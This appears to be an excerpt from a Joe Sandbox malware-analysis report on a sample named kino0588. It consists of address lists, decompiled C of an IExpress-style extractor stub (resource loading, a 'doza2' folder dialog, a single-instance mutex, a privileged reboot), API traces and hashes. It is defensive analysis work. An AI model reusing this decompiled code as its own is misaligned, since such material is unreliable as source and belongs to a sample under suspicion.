0x00b85d51
0x00b85d5b
0x00b85d72
0x00b860fb
0x00b860fb
0x00b86207
0x00b8620a
0x00b8620b
0x00b8620e
0x00b86217
0x00b85d78
0x00b85d78
0x00b85d80
0x00b85d83
0x00b85d84
0x00000000
0x00b85d84
0x00b85d5d
0x00b85d5f
0x00b85d62
0x00b85d68
0x00b85d64
0x00b85d64
0x00b85d64
0x00000000
0x00b85d62
0x00b85d5b
0x00b85d4f
0x00b85d1d
0x00000000
0x00b85d9f
0x00b85d9f
0x00b85da5
0x00b85dab
0x00b85dba
0x00b86218
0x00b8621d
0x00b86220
0x00b86221
0x00b86229
0x00b86230
0x00b86247
0x00b8626a
0x00b86272
0x00b86249
0x00b86255
0x00b8625f
0x00b86264
0x00b86264
0x00b86284
0x00b85dc0
0x00b85dc0
0x00b85dca
0x00b85e22
0x00000000
0x00000000
0x00000000
0x00000000
0x00b85dcc
0x00b85dce
0x00b85e24
0x00b85e24
0x00b85e2c
0x00b85e47
0x00b85e4a
0x00b861d2
0x00b861e2
0x00b861e7
0x00b861ee
0x00b861f1
0x00b861f1
0x00b861f8
0x00b861f8
0x00b85e50
0x00b85e53
0x00b86109
0x00b8611f
0x00000000
0x00b86125
0x00b86137
0x00b8613a
0x00b8613c
0x00b8613e
0x00b8613e
0x00b86141
0x00b86141
0x00b86143
0x00b86144
0x00b8614a
0x00000000
0x00b86150
0x00b86152
0x00b8615c
0x00b86170
0x00b86172
0x00b8617c
0x00b86190
0x00b86190
0x00b86196
0x00b861a5
0x00000000
0x00b861ab
0x00b861b9
0x00b861c6
0x00b861c6
0x00b8617e
0x00b86180
0x00b8618a
0x00000000
0x00000000
0x00000000
0x00000000
0x00b8618a
0x00b8615e
0x00b86160
0x00b8616a
0x00000000
0x00000000
0x00000000
0x00000000
0x00b8616a
0x00b8615c
0x00b8614a
0x00b8610b
0x00b8610e
0x00b8610e
0x00000000
0x00b85e59
0x00b85e59
0x00b85e5c
0x00b8604f
0x00b86056
0x00000000
0x00b8605c
0x00b8606e
0x00b86071
0x00b86073
0x00b86075
0x00b86075
0x00b86078
0x00b86078
0x00b8607a
0x00b8607b
0x00b86081
0x00000000
0x00b86087
0x00b86087
0x00b8608d
0x00b8609c
0x00000000
0x00b860a2
0x00b860aa
0x00b860b2
0x00b860b7
0x00b860bd
0x00b860bf
0x00b860bf
0x00b860d6
0x00b860e0
0x00b860e7
0x00b860f5
0x00000000
0x00000000
0x00000000
0x00000000
0x00b860f5
0x00b8609c
0x00b86081
0x00b85e62
0x00b85e62
0x00b85e65
0x00b85fd3
0x00b85fe9
0x00000000
0x00b85fef
0x00b85fef
0x00b85ff7
0x00b85ffd
0x00b86003
0x00b86006
0x00b86011
0x00b86014
0x00b8603d
0x00b86016
0x00b86018
0x00b86019
0x00b8601b
0x00b86033
0x00b8601d
0x00b86020
0x00b86029
0x00b86022
0x00b86022
0x00b86022
0x00b86020
0x00b8601b
0x00b86042
0x00b86044
0x00b86046
0x00b8604a
0x00b85ff7
0x00b85fd5
0x00b85fd8
0x00b85fd8
0x00000000
0x00b85e6b
0x00b85e6b
0x00b85e6e
0x00b85f8b
0x00b85f99
0x00000000
0x00b85f9f
0x00b85fa7
0x00b85faf
0x00000000
0x00b85fb1
0x00b85fb3
0x00000000
0x00b85fb5
0x00b85fb7
0x00000000
0x00b85fb9
0x00000000
0x00b85fb9
0x00b85fb7
0x00b85fb3
0x00b85faf
0x00b85f8d
0x00b85f8d
0x00b85f8d
0x00b85f8f
0x00b85fc1
0x00b85fc1
0x00b85fc1
0x00000000
0x00b85e74
0x00b85e74
0x00b85e77
0x00b85ea0
0x00b85ebd
0x00b85f79
0x00000000
0x00b85f7f
0x00b85ec3
0x00b85ec3
0x00b85ecc
0x00b85ed4
0x00b85ed6
0x00b85edc
0x00b85edf
0x00b85eea
0x00b85eed
0x00b85f3f
0x00b85f40
0x00000000
0x00b85eef
0x00b85eef
0x00b85ef2
0x00b85f34
0x00b85ef4
0x00b85ef4
0x00b85ef7
0x00b85f2b
0x00000000
0x00b85ef9
0x00b85ef9
0x00b85efc
0x00b85f22
0x00000000
0x00b85efe
0x00b85eff
0x00b85f02
0x00b85f16
0x00b85f04
0x00b85f07
0x00b85f0d
0x00b85f46
0x00b85f46
0x00b85f09
0x00b85f09
0x00b85f09
0x00b85f07
0x00b85f02
0x00b85efc
0x00b85ef7
0x00b85ef2
0x00b85f4c
0x00b85f4e
0x00b85f50
0x00b85f54
0x00b85ed4
0x00b85ea2
0x00b85ea4
0x00b85eaf
0x00b85eaf
0x00000000
0x00b85e79
0x00b85e7d
0x00000000
0x00b85e83
0x00b85e83
0x00b85e83
0x00b85e85
0x00b85e85
0x00b85e8e
0x00000000
0x00b85e94
0x00000000
0x00b85e94
0x00b85e8e
0x00b85e7d
0x00b85e77
0x00b85e6e
0x00b85e65
0x00b85e5c
0x00000000
0x00000000
0x00000000
0x00b85dd0
0x00b85dd0
0x00b85dd0
0x00000000
0x00b85dd0
0x00b85dce
0x00b85dca
0x00b85dba
0x00000000
0x00b85d00
0x00b85dd9
0x00b85e04
0x00b861fe
0x00b85e0a
0x00b85e0c
0x00b85e17
0x00b85e17
0x00b85e04
0x00b86200
0x00b86200
0x00000000

APIs

CharNextA.USER32(?,00000000,?,?), ref: 00B85CEE
GetModuleFileNameA.KERNEL32(00B88B3E,00000104,00000000,?,?), ref: 00B85DFC
CharUpperA.USER32(?), ref: 00B85E3E
CharUpperA.USER32(-00000052), ref: 00B85EE1
CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00B85F6F
CharUpperA.USER32(?), ref: 00B85FA7
CharUpperA.USER32(-0000004E), ref: 00B86008
CharUpperA.USER32(?), ref: 00B860AA
CloseHandle.KERNEL32(00000000,00B81140,00000000,00000040,00000000), ref: 00B861F1
ExitProcess.KERNEL32 ref: 00B861F8

Strings

", xrefs: 00B85D78
:, xrefs: 00B86118
RegServer, xrefs: 00B85F66
", xrefs: 00B8612D

Memory Dump Source

Source File: 00000003.00000002.372270915.0000000000B81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000003.00000002.372266607.0000000000B80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372280591.0000000000B88000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b80000_kino0588.jbxd

Similarity

API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
String ID: "$"$:$RegServer
API String ID: 1203814774-25366791
Opcode ID: 49d9af763e841123d7a3a661c501385dca8e1423f0e5099d3543b0a0a41c48de
Instruction ID: fd2b04b4c3f132024f3f9fb5ae18fe3fe3c72f8df1122e6127551295999c1379
Opcode Fuzzy Hash: 49d9af763e841123d7a3a661c501385dca8e1423f0e5099d3543b0a0a41c48de
Instruction Fuzzy Hash: 35D13671A04A495BDF35BB388C887FA7BE1EB16305F5441EAC586D71B1DA708E86CF01

Uniqueness

Uniqueness Score: -1.00%

Function 00B81F90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94
shutdownCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E00B81F90(signed int __ecx, void* __edi, void* __esi) {
				signed int _v8;
				int _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* _v28;
				void* __ebx;
				signed int _t13;
				int _t21;
				void* _t25;
				int _t28;
				signed char _t30;
				void* _t38;
				void* _t40;
				void* _t41;
				signed int _t46;

				_t41 = __esi;
				_t38 = __edi;
				_t30 = __ecx;
				if((__ecx & 0x00000002) != 0) {
					L12:
					if((_t30 & 0x00000004) != 0) {
						L14:
						if( *0xb89a40 != 0) {
							_pop(_t30);
							_t44 = _t46;
							_t13 =  *0xb88004; // 0xfbc33aab
							_v8 = _t13 ^ _t46;
							_push(_t38);
							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
								_v24.PrivilegeCount = 1;
								_v12 = 2;
								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
								CloseHandle(_v28);
								_t41 = _t41;
								_push(0);
								if(_t21 != 0) {
									if(ExitWindowsEx(2, ??) != 0) {
										_t25 = 1;
									} else {
										_t37 = 0x4f7;
										goto L3;
									}
								} else {
									_t37 = 0x4f6;
									goto L4;
								}
							} else {
								_t37 = 0x4f5;
								L3:
								_push(0);
								L4:
								_push(0x10);
								_push(0);
								_push(0);
								E00B844B9(0, _t37);
								_t25 = 0;
							}
							_pop(_t40);
							return E00B86CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
						} else {
							_t28 = ExitWindowsEx(2, 0);
							goto L16;
						}
					} else {
						_t37 = 0x522;
						_t28 = E00B844B9(0, 0x522, 0xb81140, 0, 0x40, 4);
						if(_t28 != 6) {
							goto L16;
						} else {
							goto L14;
						}
					}
				} else {
					__eax = E00B81EA7(__ecx);
					if(__eax != 2) {
						L16:
						return _t28;
					} else {
						goto L12;
					}
				}
			}

0x00b81f90
0x00b81f90
0x00b81f93
0x00b81f98
0x00b81fa4
0x00b81fa7
0x00b81fc5
0x00b81fcd
0x00b81fdb
0x00b81ee5
0x00b81eea
0x00b81ef1
0x00b81ef4
0x00b81f0c
0x00b81f2e
0x00b81f3a
0x00b81f46
0x00b81f4d
0x00b81f58
0x00b81f60
0x00b81f61
0x00b81f62
0x00b81f75
0x00b81f80
0x00b81f77
0x00b81f77
0x00000000
0x00b81f77
0x00b81f64
0x00b81f64
0x00000000
0x00b81f64
0x00b81f0e
0x00b81f0e
0x00b81f13
0x00b81f13
0x00b81f14
0x00b81f14
0x00b81f16
0x00b81f17
0x00b81f1a
0x00b81f1f
0x00b81f1f
0x00b81f86
0x00b81f8f
0x00b81fcf
0x00b81fd3
0x00000000
0x00b81fd3
0x00b81fa9
0x00b81fb4
0x00b81fbb
0x00b81fc3
0x00000000
0x00000000
0x00000000
0x00000000
0x00b81fc3
0x00b81f9a
0x00b81f9a
0x00b81fa2
0x00b81fd9
0x00b81fda
0x00000000
0x00000000
0x00000000
0x00b81fa2

APIs

GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00B81EFB
OpenProcessToken.ADVAPI32(00000000), ref: 00B81F02
ExitWindowsEx.USER32(00000002,00000000), ref: 00B81FD3

Strings

SeShutdownPrivilege, xrefs: 00B81F28

Memory Dump Source

Source File: 00000003.00000002.372270915.0000000000B81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000003.00000002.372266607.0000000000B80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372280591.0000000000B88000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b80000_kino0588.jbxd

Similarity

API ID: Process$CurrentExitOpenTokenWindows
String ID: SeShutdownPrivilege
API String ID: 2795981589-3733053543
Opcode ID: 61bd6fe41365981b54ce2c2c6eade03ae92e2fd9ffc0ca15c526321322257963
Instruction ID: 3a004509557bbed984eba9e9e3e1cdadd0aae742aa23878407b11900b1b27780
Opcode Fuzzy Hash: 61bd6fe41365981b54ce2c2c6eade03ae92e2fd9ffc0ca15c526321322257963
Instruction Fuzzy Hash: 8421D871A41205ABEB207BA99C4AF7F76FCDB85B10F100859FB02E71B0DB748802D761

Uniqueness

Uniqueness Score: -1.00%

Function 00B86CF0 Relevance: 6.0, APIs: 4, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B86CF0(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				UnhandledExceptionFilter(_a4);
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x00b86cf7
0x00b86d00
0x00b86d19

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00B86E26,00B81000), ref: 00B86CF7
UnhandledExceptionFilter.KERNEL32(00B86E26,?,00B86E26,00B81000), ref: 00B86D00
GetCurrentProcess.KERNEL32(C0000409,?,00B86E26,00B81000), ref: 00B86D0B
TerminateProcess.KERNEL32(00000000,?,00B86E26,00B81000), ref: 00B86D12

Memory Dump Source

Source File: 00000003.00000002.372270915.0000000000B81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000003.00000002.372266607.0000000000B80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372280591.0000000000B88000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b80000_kino0588.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID:
API String ID: 3231755760-0
Opcode ID: 616539237603da25e87e3275b434a493a74e37177127f415c6d277f899fee770
Instruction ID: 5674aba7cfb993d204345e86dc508e121b95c82df2bed944f557a438712d6df1
Opcode Fuzzy Hash: 616539237603da25e87e3275b434a493a74e37177127f415c6d277f899fee770
Instruction Fuzzy Hash: 88D0C932000108FBFB003BE1EC0CA593F28EB4A612F484002F319A3030CE365451CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00B83210 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 188
windowCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E00B83210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* __edi;
				void* _t6;
				void* _t10;
				int _t20;
				int _t21;
				int _t23;
				char _t24;
				long _t25;
				int _t27;
				int _t30;
				void* _t32;
				int _t33;
				int _t34;
				int _t37;
				int _t38;
				int _t39;
				void* _t42;
				void* _t46;
				CHAR* _t49;
				void* _t58;
				void* _t63;
				struct HWND__* _t64;

				_t64 = _a4;
				_t6 = _a8 - 0x10;
				if(_t6 == 0) {
					_push(0);
					L38:
					EndDialog(_t64, ??);
					L39:
					__eflags = 1;
					return 1;
				}
				_t42 = 1;
				_t10 = _t6 - 0x100;
				if(_t10 == 0) {
					E00B843D0(_t64, GetDesktopWindow());
					SetWindowTextA(_t64, "doza2");
					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
					__eflags =  *0xb89a40 - _t42; // 0x3
					if(__eflags == 0) {
						EnableWindow(GetDlgItem(_t64, 0x836), 0);
					}
					L36:
					return _t42;
				}
				if(_t10 == _t42) {
					_t20 = _a12 - 1;
					__eflags = _t20;
					if(_t20 == 0) {
						_t21 = GetDlgItemTextA(_t64, 0x835, 0xb891e4, 0x104);
						__eflags = _t21;
						if(_t21 == 0) {
							L32:
							_t58 = 0x4bf;
							_push(0);
							_push(0x10);
							_push(0);
							_push(0);
							L25:
							E00B844B9(_t64, _t58);
							goto L39;
						}
						_t49 = 0xb891e4;
						do {
							_t23 =  *_t49;
							_t49 =  &(_t49[1]);
							__eflags = _t23;
						} while (_t23 != 0);
						__eflags = _t49 - 0xb891e5 - 3;
						if(_t49 - 0xb891e5 < 3) {
							goto L32;
						}
						_t24 =  *0xb891e5; // 0x3a
						__eflags = _t24 - 0x3a;
						if(_t24 == 0x3a) {
							L21:
							_t25 = GetFileAttributesA(0xb891e4);
							__eflags = _t25 - 0xffffffff;
							if(_t25 != 0xffffffff) {
								L26:
								E00B8658A(0xb891e4, 0x104, 0xb81140);
								_t27 = E00B858C8(0xb891e4);
								__eflags = _t27;
								if(_t27 != 0) {
									__eflags =  *0xb891e4 - 0x5c;
									if( *0xb891e4 != 0x5c) {
										L30:
										_t30 = E00B8597D(0xb891e4, 1, _t64, 1);
										__eflags = _t30;
										if(_t30 == 0) {
											L35:
											_t42 = 1;
											__eflags = 1;
											goto L36;
										}
										L31:
										_t42 = 1;
										EndDialog(_t64, 1);
										goto L36;
									}
									__eflags =  *0xb891e5 - 0x5c;
									if( *0xb891e5 == 0x5c) {
										goto L31;
									}
									goto L30;
								}
								_push(0);
								_push(0x10);
								_push(0);
								_push(0);
								_t58 = 0x4be;
								goto L25;
							}
							_t32 = E00B844B9(_t64, 0x54a, 0xb891e4, 0, 0x20, 4);
							__eflags = _t32 - 6;
							if(_t32 != 6) {
								goto L35;
							}
							_t33 = CreateDirectoryA(0xb891e4, 0);
							__eflags = _t33;
							if(_t33 != 0) {
								goto L26;
							}
							_push(0);
							_push(0x10);
							_push(0);
							_push(0xb891e4);
							_t58 = 0x4cb;
							goto L25;
						}
						__eflags =  *0xb891e4 - 0x5c;
						if( *0xb891e4 != 0x5c) {
							goto L32;
						}
						__eflags = _t24 - 0x5c;
						if(_t24 != 0x5c) {
							goto L32;
						}
						goto L21;
					}
					_t34 = _t20 - 1;
					__eflags = _t34;
					if(_t34 == 0) {
						EndDialog(_t64, 0);
						 *0xb89124 = 0x800704c7;
						goto L39;
					}
					__eflags = _t34 != 0x834;
					if(_t34 != 0x834) {
						goto L36;
					}
					_t37 = LoadStringA( *0xb89a3c, 0x3e8, 0xb88598, 0x200);
					__eflags = _t37;
					if(_t37 != 0) {
						_t38 = E00B84224(_t64, _t46, _t46);
						__eflags = _t38;
						if(_t38 == 0) {
							goto L36;
						}
						_t39 = SetDlgItemTextA(_t64, 0x835, 0xb887a0);
						__eflags = _t39;
						if(_t39 != 0) {
							goto L36;
						}
						_t63 = 0x4c0;
						L9:
						E00B844B9(_t64, _t63, 0, 0, 0x10, 0);
						_push(0);
						goto L38;
					}
					_t63 = 0x4b1;
					goto L9;
				}
				return 0;
			}

0x00b8321b
0x00b8321e
0x00b83221
0x00b8343c
0x00b8343e
0x00b8343f
0x00b83445
0x00b83447
0x00000000
0x00b83447
0x00b83229
0x00b8322a
0x00b8322f
0x00b833ec
0x00b833f7
0x00b83410
0x00b83416
0x00b8341d
0x00b8342d
0x00b8342d
0x00b83438
0x00000000
0x00b83438
0x00b83237
0x00b83243
0x00b83243
0x00b83246
0x00b832ee
0x00b832f4
0x00b832f6
0x00b833d4
0x00b833d6
0x00b833db
0x00b833dc
0x00b833de
0x00b833df
0x00b83370
0x00b83372
0x00000000
0x00b83372
0x00b832fc
0x00b83301
0x00b83301
0x00b83303
0x00b83304
0x00b83304
0x00b8330a
0x00b8330d
0x00000000
0x00000000
0x00b83313
0x00b83318
0x00b8331a
0x00b83331
0x00b83332
0x00b8333a
0x00b8333d
0x00b8337c
0x00b83388
0x00b8338f
0x00b83394
0x00b83396
0x00b833a4
0x00b833ab
0x00b833b6
0x00b833be
0x00b833c3
0x00b833c5
0x00b83435
0x00b83437
0x00b83437
0x00000000
0x00b83437
0x00b833c7
0x00b833c9
0x00b833cc
0x00000000
0x00b833cc
0x00b833ad
0x00b833b4
0x00000000
0x00000000
0x00000000
0x00b833b4
0x00b83398
0x00b83399
0x00b8339b
0x00b8339c
0x00b8339d
0x00000000
0x00b8339d
0x00b8334c
0x00b83351
0x00b83354
0x00000000
0x00000000
0x00b8335c
0x00b83362
0x00b83364
0x00000000
0x00000000
0x00b83366
0x00b83367
0x00b83369
0x00b8336a
0x00b8336b
0x00000000
0x00b8336b
0x00b8331c
0x00b83323
0x00000000
0x00000000
0x00b83329
0x00b8332b
0x00000000
0x00000000
0x00000000
0x00b8332b
0x00b8324c
0x00b8324c
0x00b8324f
0x00b832c8
0x00b832ce
0x00000000
0x00b832ce
0x00b83251
0x00b83256
0x00000000
0x00000000
0x00b83271
0x00b83277
0x00b83279
0x00b83298
0x00b8329d
0x00b8329f
0x00000000
0x00000000
0x00b832b0
0x00b832b6
0x00b832b8
0x00000000
0x00000000
0x00b832be
0x00b83280
0x00b83289
0x00b8328e
0x00000000
0x00b8328e
0x00b8327b
0x00000000
0x00b8327b
0x00000000

APIs

LoadStringA.USER32(000003E8,00B88598,00000200), ref: 00B83271
GetDesktopWindow.USER32 ref: 00B833E2
SetWindowTextA.USER32(?,doza2), ref: 00B833F7
SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00B83410
GetDlgItem.USER32(?,00000836), ref: 00B83426
EnableWindow.USER32(00000000), ref: 00B8342D
EndDialog.USER32(?,00000000), ref: 00B8343F

Strings

doza2, xrefs: 00B833F1
C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 00B832E2, 00B832E7, 00B83331, 00B83344, 00B8335B, 00B8336A

Memory Dump Source

Source File: 00000003.00000002.372270915.0000000000B81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000003.00000002.372266607.0000000000B80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372280591.0000000000B88000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b80000_kino0588.jbxd

Similarity

API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$doza2
API String ID: 2418873061-1836830913
Opcode ID: 06d1fc3f9dab590b31645997dd12ce5dd5c4acef12549f354cd50c7f111a60e6
Instruction ID: 24e5d53acb5e3ff975727fb4c019aea51cc230d512eb1f7eac9780b61c7fcd1c
Opcode Fuzzy Hash: 06d1fc3f9dab590b31645997dd12ce5dd5c4acef12549f354cd50c7f111a60e6
Instruction Fuzzy Hash: 6F510430341241BAFB217B359C8CF7B2AD9DB46F54F1840A9F645A72F0CEA88A02D365

Uniqueness

Uniqueness Score: -1.00%

Function 00B82CAA Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 183
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00B82CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				void* _t20;
				void* _t23;
				void* _t27;
				struct HRSRC__* _t31;
				intOrPtr _t33;
				void* _t43;
				void* _t48;
				signed int _t65;
				struct HINSTANCE__* _t66;
				signed int _t67;

				_t13 =  *0xb88004; // 0xfbc33aab
				_v8 = _t13 ^ _t67;
				_t65 = 0;
				_t66 = __ecx;
				_t48 = __edx;
				 *0xb89a3c = __ecx;
				memset(0xb89140, 0, 0x8fc);
				memset(0xb88a20, 0, 0x32c);
				memset(0xb888c0, 0, 0x104);
				 *0xb893ec = 1;
				_t20 = E00B8468F("TITLE", 0xb89154, 0x7f);
				if(_t20 == 0 || _t20 > 0x80) {
					_t64 = 0x4b1;
					goto L32;
				} else {
					_t27 = CreateEventA(0, 1, 1, 0);
					 *0xb8858c = _t27;
					SetEvent(_t27);
					_t64 = 0xb89a34;
					if(E00B8468F("EXTRACTOPT", 0xb89a34, 4) != 0) {
						if(( *0xb89a34 & 0x000000c0) == 0) {
							L12:
							 *0xb89120 =  *0xb89120 & _t65;
							if(E00B85C9E(_t48, _t48, _t65, _t66) != 0) {
								if( *0xb88a3a == 0) {
									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
									if(_t31 != 0) {
										_t65 = LoadResource(_t66, _t31);
									}
									if( *0xb88184 != 0) {
										__imp__#17();
									}
									if( *0xb88a24 == 0) {
										_t57 = _t65;
										if(E00B836EE(_t65) == 0) {
											goto L33;
										} else {
											_t33 =  *0xb89a40; // 0x3
											_t48 = 1;
											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
												if(( *0xb89a34 & 0x00000100) == 0 || ( *0xb88a38 & 0x00000001) != 0 || E00B818A3(_t64, _t66) != 0) {
													goto L30;
												} else {
													_t64 = 0x7d6;
													if(E00B86517(_t57, 0x7d6, _t34, E00B819E0, 0x547, 0x83e) != 0x83d) {
														goto L33;
													} else {
														goto L30;
													}
												}
											} else {
												L30:
												_t23 = _t48;
											}
										}
									} else {
										_t23 = 1;
									}
								} else {
									E00B82390(0xb88a3a);
									goto L33;
								}
							} else {
								_t64 = 0x520;
								L32:
								E00B844B9(0, _t64, 0, 0, 0x10, 0);
								goto L33;
							}
						} else {
							_t64 =  &_v268;
							if(E00B8468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
								goto L3;
							} else {
								_t43 = CreateMutexA(0, 1,  &_v268);
								 *0xb88588 = _t43;
								if(_t43 == 0 || GetLastError() != 0xb7) {
									goto L12;
								} else {
									if(( *0xb89a34 & 0x00000080) == 0) {
										_t64 = 0x524;
										if(E00B844B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
											goto L12;
										} else {
											goto L11;
										}
									} else {
										_t64 = 0x54b;
										E00B844B9(0, 0x54b, "doza2", 0, 0x10, 0);
										L11:
										CloseHandle( *0xb88588);
										 *0xb89124 = 0x800700b7;
										goto L33;
									}
								}
							}
						}
					} else {
						L3:
						_t64 = 0x4b1;
						E00B844B9(0, 0x4b1, 0, 0, 0x10, 0);
						 *0xb89124 = 0x80070714;
						L33:
						_t23 = 0;
					}
				}
				return E00B86CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
			}

0x00b82cb5
0x00b82cbc
0x00b82cc7
0x00b82cc9
0x00b82cd1
0x00b82cd3
0x00b82cd9
0x00b82ce9
0x00b82cf9
0x00b82d0e
0x00b82d15
0x00b82d1c
0x00b82ef3
0x00000000
0x00b82d2d
0x00b82d34
0x00b82d3b
0x00b82d40
0x00b82d48
0x00b82d59
0x00b82d84
0x00b82e1f
0x00b82e1f
0x00b82e2e
0x00b82e41
0x00b82e5a
0x00b82e62
0x00b82e6c
0x00b82e6c
0x00b82e75
0x00b82e77
0x00b82e77
0x00b82e84
0x00b82e8b
0x00b82e94
0x00000000
0x00b82e96
0x00b82e96
0x00b82e9e
0x00b82ea2
0x00b82eba
0x00000000
0x00b82ece
0x00b82ede
0x00b82eed
0x00000000
0x00000000
0x00000000
0x00000000
0x00b82eed
0x00b82eef
0x00b82eef
0x00b82eef
0x00b82eef
0x00b82ea2
0x00b82e86
0x00b82e88
0x00b82e88
0x00b82e43
0x00b82e48
0x00000000
0x00b82e48
0x00b82e30
0x00b82e30
0x00b82ef8
0x00b82f01
0x00000000
0x00b82f01
0x00b82d8a
0x00b82d8f
0x00b82da1
0x00000000
0x00b82da3
0x00b82dae
0x00b82db4
0x00b82dbb
0x00000000
0x00b82dca
0x00b82dd3
0x00b82df5
0x00b82e02
0x00000000
0x00000000
0x00000000
0x00000000
0x00b82dd5
0x00b82dde
0x00b82de3
0x00b82e04
0x00b82e0a
0x00b82e10
0x00000000
0x00b82e10
0x00b82dd3
0x00b82dbb
0x00b82da1
0x00b82d5b
0x00b82d5b
0x00b82d5d
0x00b82d69
0x00b82d6e
0x00b82f06
0x00b82f06
0x00b82f06
0x00b82d59
0x00b82f18

APIs

memset.MSVCRT ref: 00B82CD9
memset.MSVCRT ref: 00B82CE9
memset.MSVCRT ref: 00B82CF9

Part of subcall function 00B8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00B846A0
Part of subcall function 00B8468F: SizeofResource.KERNEL32(00000000,00000000,?,00B82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00B846A9
Part of subcall function 00B8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00B846C3
Part of subcall function 00B8468F: LoadResource.KERNEL32(00000000,00000000,?,00B82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00B846CC
Part of subcall function 00B8468F: LockResource.KERNEL32(00000000,?,00B82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00B846D3
Part of subcall function 00B8468F: memcpy_s.MSVCRT ref: 00B846E5
Part of subcall function 00B8468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00B846EF

CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00B82D34
SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00B82D40
CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00B82DAE
GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00B82DBD
CloseHandle.KERNEL32(doza2,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00B82E0A

Part of subcall function 00B844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00B84518
Part of subcall function 00B844B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00B84554

Strings

INSTANCECHECK, xrefs: 00B82D95
EXTRACTOPT, xrefs: 00B82D4D
TITLE, xrefs: 00B82D09
doza2, xrefs: 00B82D04, 00B82DD9, 00B82DF0
VERCHECK, xrefs: 00B82E54

Memory Dump Source

Source File: 00000003.00000002.372270915.0000000000B81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000003.00000002.372266607.0000000000B80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372280591.0000000000B88000.00000004.00000001.01000000.00000006.sdmpDownload File
